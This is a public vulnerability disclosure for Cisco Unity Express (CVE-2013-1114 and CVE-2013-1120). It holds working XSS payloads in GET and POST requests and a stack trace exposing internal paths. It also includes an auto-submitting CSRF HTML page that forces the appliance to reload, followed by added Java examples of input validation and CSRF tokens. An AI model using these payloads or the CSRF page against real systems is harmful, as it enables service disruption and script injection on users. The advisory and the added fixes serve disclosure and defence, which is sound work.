"Cisco Unity Express - Multiple Vulnerabilities"

Author: "Jacob Holcomb"
Platform: jsp
Release date: 2013-02-05

# Exploit Title: Cisco Unity Express Multiple Vulnerabilities
# Reported: December 2012
# Disclosed: February 2013
# Author: Jacob Holcomb of Independent Security Evaluators
# CVE: XSS - CVE-2013-1114 and CSRF - CVE-2013-1120
# http://infosec42.blogspot.com/2013/02/cisco-unity-express-vulnerabilites.html

Cisco Advisory
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1114
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1120 

Proof of Concept
XSS - CVE-2013-1114:
GET:
Reflected XSS & information disclosure
http://X.X.X.X/Web/SA2/ScriptList.do?gui_pagenotableData=><script>alert(42)</script>

Information Disclosure
Location: /Web/WEB-INF/screens/main.jsp
Error Location: /Web/WEB-INF/screens/prompts/ListScripts.jsp
Internal Servlet Error:

javax.servlet.ServletException: invalid character at position 1 in >
org.apache.jasper.runtime.PageContextImpl.handlePageException (Unknown Source)
WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:2245)
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
java.security.AccessController.doPrivileged (AccessController.java:273)
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source)
org.apache.jasper.runtime.PageContextImpl.include (Unknown Source)
WEB_0002dINF.screens.main._jspService (main.java:396)
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
java.security.AccessController.doPrivileged (AccessController.java:273)
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source)
org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759)
org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596)
com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157)
org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.core.ContextManager.internalService (Unknown Source)
org.apache.tomcat.core.ContextManager.service (Unknown Source)
org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source)
org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source)
org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source)
java.lang.Thread.run (Thread.java:777)

Root cause:
java.lang.NumberFormatException: invalid character at position 1 in >
java.lang.Throwable. (Throwable.java:166)
java.lang.Integer.parseInt (Integer.java:775)
java.lang.Integer.parseInt (Integer.java:262)
com.cisco.aesop.gui.taglibs.PagingTableTag.doAfterBody (PagingTableTag.java:274)
WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:1903)
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
java.security.AccessController.doPrivileged (AccessController.java:273)
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source)
org.apache.jasper.runtime.PageContextImpl.include (Unknown Source)
WEB_0002dINF.screens.main._jspService (main.java:396)
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
java.security.AccessController.doPrivileged (AccessController.java:273)
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source)
org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759)
org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596)
com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157)
org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.core.ContextManager.internalService (Unknown Source)
org.apache.tomcat.core.ContextManager.service (Unknown Source)
org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source)
org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source)
org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source)
java.lang.Thread.run (Thread.java:777)



POST:
Persistent XSS
http://X.X.X.X/Web/SA3/AddHoliday.do
POST Data: holiday.description=><script>alert(42)</script>&submitType=ADD
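
Added example (not part of the original advisory and not Cisco's code): the root cause in the trace above is Integer.parseInt being called on the raw gui_pagenotableData value, with the resulting exception and the input both rendered to the client. The sketch below shows the two server-side controls that close the GET and POST issues, strict numeric parsing with a safe fallback and HTML encoding of anything echoed or stored for display (such as holiday.description). The class, method and constant names are hypothetical.

```java
import java.util.List;

// Added example: hypothetical helper names, not the product's own code.
public class PagingParamDemo {
    static final int DEFAULT_PAGE = 1;
    static final int MAX_PAGE = 10_000;

    // Strict parse: digits only and bounded. Anything else falls back to the
    // default, so no NumberFormatException (and no stack trace) reaches the page.
    static int parsePage(String raw) {
        if (raw == null || !raw.matches("[0-9]{1,5}")) {
            return DEFAULT_PAGE;
        }
        int page = Integer.parseInt(raw); // cannot overflow: at most 5 digits
        return (page >= 1 && page <= MAX_PAGE) ? page : DEFAULT_PAGE;
    }

    // Minimal HTML encoder for element text and quoted attribute values.
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&': out.append("&amp;"); break;
                case '<': out.append("&lt;"); break;
                case '>': out.append("&gt;"); break;
                case '"': out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                default: out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // Constructed inputs: a valid page number, the test value used on this
        // page, and a number outside the accepted range.
        List<String> samples = List.of("3", "><script>alert(42)</script>", "99999");
        for (String raw : samples) {
            System.out.println("page=" + parsePage(raw) + "  rendered=" + escapeHtml(raw));
        }
    }
}
```

Pair this with a generic error page configured in the container so that servlet exceptions never expose JSP paths or class names to the client.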


CSRF - CVE-2013-1120:

<html>
<!-- # Exploit Title: Cisco Unity Express CSRF
     # Date: Discovered and reported December 2012
     # Disclosed: February 2013
     # Author: Jacob Holcomb of Independent Security Evaluators
     # Software: Cisco Unity Express
     # CVE : CVE-2013-1120 for the CSRF
     # Note: All the HTML forms are susceptible to forgery -->

<head>
<title>Reload Cisco Unity Express CSRF</title>
</head>

<body>

<form name="CUEreload" action="http://X.X.X.X/Web/SA/SaveConfiguration.do" method="post">
<input type="hidden" name="submitType" value="RELOAD"/>
</form>

<script>
document.CUEreload.submit();
</script>

</body>
</html>
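
Added example (not part of the original advisory and not Cisco's code): the form above succeeds because the request carries nothing that an outside page cannot supply. The sketch below models a per-session synchronizer token check with plain maps so it runs without a servlet container; the parameter name csrfToken and all class and method names are hypothetical.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

// Added example: session and request parameters are modelled as maps.
// In a real deployment this logic sits in a filter in front of every *.do action.
public class CsrfTokenDemo {
    static final String SESSION_KEY = "csrfToken"; // hypothetical parameter name
    static final SecureRandom RNG = new SecureRandom();

    // Issue one unpredictable token per session; the server embeds it as a
    // hidden field in every form it renders.
    static String issueToken(Map<String, String> session) {
        byte[] buf = new byte[32];
        RNG.nextBytes(buf);
        String token = Base64.getUrlEncoder().withoutPadding().encodeToString(buf);
        session.put(SESSION_KEY, token);
        return token;
    }

    // Safe methods pass (state-changing actions must not be reachable via GET).
    // Everything else needs a token equal to the session's copy, compared in
    // constant time.
    static boolean isAllowed(String method, Map<String, String> session, Map<String, String> params) {
        if (method.equals("GET") || method.equals("HEAD")) {
            return true;
        }
        String expected = session.get(SESSION_KEY);
        String supplied = params.get(SESSION_KEY);
        if (expected == null || supplied == null) return false;
        return MessageDigest.isEqual(expected.getBytes(StandardCharsets.UTF_8),
                                     supplied.getBytes(StandardCharsets.UTF_8));
    }

    public static void main(String[] args) {
        Map<String, String> session = new HashMap<>();
        String token = issueToken(session);
        // Constructed request 1: a cross-site form that carries only submitType.
        Map<String, String> forged = new HashMap<>();
        forged.put("submitType", "RELOAD");
        // Constructed request 2: the application's own form, which includes the token.
        Map<String, String> genuine = new HashMap<>(forged);
        genuine.put(SESSION_KEY, token);
        System.out.println("forged allowed:  " + isAllowed("POST", session, forged));
        System.out.println("genuine allowed: " + isAllowed("POST", session, genuine));
    }
}
```

Because the advisory notes that all forms are affected, the check belongs in one central filter rather than in individual actions.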